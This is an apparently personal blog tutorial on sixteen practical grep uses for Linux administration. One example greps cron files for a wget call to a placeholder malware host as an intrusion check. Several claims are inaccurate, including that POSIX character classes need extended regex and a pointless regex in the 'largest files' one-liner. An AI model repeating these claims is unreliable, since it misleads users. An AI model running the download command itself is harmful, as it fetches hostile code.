Alexis Kestler
As an experienced Linux system administrator and command line geek, grep is one of my most used and cherished tools. With its simple yet powerful abilities to filter text streams and search files by regex patterns, grep enables me to quickly slice and dice textual data to extract just what I need.
In my decade-plus in this field, I‘ve gathered numerous handy grep techniques and use cases that make my daily work far more productive. I‘d like to share some of my grep wisdom with you in this comprehensive guide, so you can also master this versatile utility.
While grep‘s basic usage is simple, truly harnessing its capabilities requires some practice and knowledge. But once internalized, grep skills will boost your effectiveness at the terminal.
Let‘s dive into 16 practical examples of how to use grep in real-world situations. I‘ll share tips and flags you may not know, along with examples of how I leverage grep in my daily work.
Grep Basics: A Quick Primer
For those new to grep, let‘s first cover some basics. The core syntax is:
grep [options] pattern [file]This searches for pattern within file and prints any matching lines. For example:
grep admin /var/log/auth.logThis prints any lines in the auth log containing "admin".
Grep accepts various useful options, like -i for case-insensitive search, -v to print non-matching lines, -c to print a match count, and so on.
Grep takes input from files or streams like pipelines and stdin. For example:
ps aux | grep bashThis searches running processes for "bash".
Now that we‘ve covered the basics, let‘s explore some more advanced real-world examples.
1. Pinpoint Errors in Log Files
As a sysadmin, debugging issues means scanning log files for relevant error messages. This is a perfect use case for grep.
For example, if users complain that the Apache web server is failing, I‘ll grep the access and error logs:
grep -i fail /var/log/httpd/error_log
grep -i error /var/log/httpd/access_logThe -i makes the searches case-insensitive, so I catch all variations of "fail", "error", "Failed", etc.
Grep helps me quickly filter the verbose log contents for relevant error messages, to pinpoint the cause.
2. Search compressed logs
Log files accumulate quickly, so I often compress old logs into .gz files to save space. Grep can still search these compressed logs using zgrep:
zgrep -i error /var/log/httpd/access.log*.gzThis searches all the compressed access logs for "error". Zgrep is a great way to search logs even after they‘ve been archived.
3. Filter command output
I often pipe command output into grep to filter out unwanted details. For example, to view only running Docker containers:
docker ps -a | grep UpThis filters stopped containers out of docker ps output.
Here‘s another example filtering ps output for java processes:
ps aux | grep javaPiping to grep like this makes it easy to filternoisy output down to what I actually need.
4. Quickly search file contents
I often use grep just to peek at file contents quickly. For example, to see if a config file contains a particular setting:
grep "LogLevel" /etc/httpd/conf/httpd.conf This is faster than opening the full file in a text editor.
Here‘s another example checking if a Java class imports a specific package:
grep "import org.springframework" MyClass.javaGrep gives me a quick glance into files to see if they contain keywords I‘m looking for.
5. Iterate through matching lines
When I need to process matching grep lines, I‘ll pipe them into a while loop, like:
grep -Ri todo /home | while read line; do
echo "TODO: $line" >> todos.txt
doneThis iterates through todo matches, echoing them into a TODO list file.
Piping grep into a while loop is perfect for when I need to operate on match results.
6. Quickly count matches
To get a quick match count across files, I use the -c flag:
grep -c ERROR /var/log/*.logThis prints just the number of "ERROR" matches for a quick error report.
-c gives a fast match count overview without printing lengthy matching lines.
7. Filter logins by username
Checking which users have logged into a system recently is a common task. I grep the auth log by username:
grep sudo /var/log/auth.log | grep jsmithThis shows sudo events just for user "jsmith".
8. Find files containing text
To hunt down files containing specific text, I use recursive grep with -R:
grep -Ri TODO /home /etcThis finds all TODO comments across home dirs and config files.
-R recursively searches the given paths to hunt down matches buried in any file.
9. Watch a log file for matches
When debugging an issue, I‘ll monitor a log file for new matching entries using:
tail -f /var/log/mail.log | grep -i errorThis streams the mail log to stdout, filtered for "error". As the log grows, I see only new error entries.
This technique helps me monitor logs live for event patterns.
10. Search across source code
As a developer, I extensively use grep to search source code trees. For example, to find all uses of a deprecated API call:
grep -R "OldApiCall" /home/project/src/This recursively finds all instances of "OldApiCall" in my project‘s source.
Grep is invaluable for code searches across large, complex codebases.
11. Leverage extended regex
Grep‘s basic regex support is good, but I often need more advanced patterns. The -E flag enables full extended regex for complex matches:
grep -E "[[:alpha:]]{5}" fileThis finds 5-letter words. The [[:alpha:]] character class is only available in extended regex.
-E unlocks powerful regex features for intricate pattern matching needs.
12. Trace system calls
When debugging performance issues, I‘ll trace what system calls an app is making using strace and grep:
strace -f -e trace=open myapp 2>&1 | grep -v ENOENT \
| awk ‘{print $NF}‘ | sort | uniq -cThis traces "open" calls, filters noise, and counts unique files opened.
Combing strace and grep helps me analyze an app‘s system call profile.
13. Search across boxes with SSH
When I need to search logs or files on remote servers, I use SSH with grep:
ssh user@host ‘zgrep ERROR /var/log/myapp/*.log.gz‘This searches the remote compressed myapp logs for "ERROR".
SSH allows me to run grep across boxes without having to first ssh in and find the files manually.
14. Look for known malware signs
I can use grep to scan systems for signs of malware or intrusion. For example, searching for a suspicious cron job entry:
grep -R "wget http://malware.example.com/" /etc/cron* /var/spool/cronGrep helps me quickly hunt for known malicious patterns across config and data files.
15. Find and delete matching lines
When I need to strip lines matching a pattern, I pipe grep into sed for deletion:
cat file.txt | grep -vE ‘^#|^$‘ | sed ‘/pattern/d‘This prints file.txt without comments or blank lines, and omitting any lines containing "pattern".
Piping grep through sed gives me surgical search-and-destroy text editing capabilities.
16. Leverage grep one-liners
I have a bag of handy grep one-liners always on hand for quick tasks, such as:
Find the largest files in /var/log:
ls -lS /var/log | grep -E ‘^.{45} .*$‘ | headExtract IP addresses from a file:
grep -Eo ‘(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)‘ file.txtPrint rows containing "ERROR" from a CSV:
csvgrep -c 3 -r "ERROR" file.csvThese handy one-liners demonstrate the power and versatility of grep for tackling specialized text processing tasks.
Conclusion
I hope this guide provides some practical examples of how grep can be leveraged in real-world scenarios, beyond basic usage. Mastering grep is a fundamental skill that will boost your proficiency at the command line.
Here are some key takeaways:
-
Grep enables powerful searches through files, streams and logs.
-
Options like -i, -v, -c, -E give additional flexibility.
-
Use grep across boxes via SSH or on compressed logs with zgrep.
-
Extended regex with -E provides advanced matching capabilities.
-
Piping grep into loops, sed, awk, or other tools unlocks more applications.
-
Keep handy grep one-liners in your back pocket for frequent tasks.
With regular practice, you‘ll quickly find yourself reaching for grep to filter, search, and slice textual data like a pro. It‘s one of the most indispensable tools for any Linux power user.
I hope these examples provide some practical usage inspiration as you continue honing your grep skills. Let me know if you have any other handy grep tricks!
